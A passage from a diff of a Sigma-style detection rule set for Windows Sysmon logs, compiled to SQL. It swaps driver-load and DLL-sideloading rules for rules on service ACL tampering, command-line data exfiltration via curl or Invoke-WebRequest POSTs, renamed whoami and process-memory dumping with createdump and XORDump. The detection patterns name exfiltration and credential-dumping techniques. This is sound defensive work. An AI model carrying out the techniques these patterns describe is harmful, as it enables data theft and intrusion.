Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", - "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR 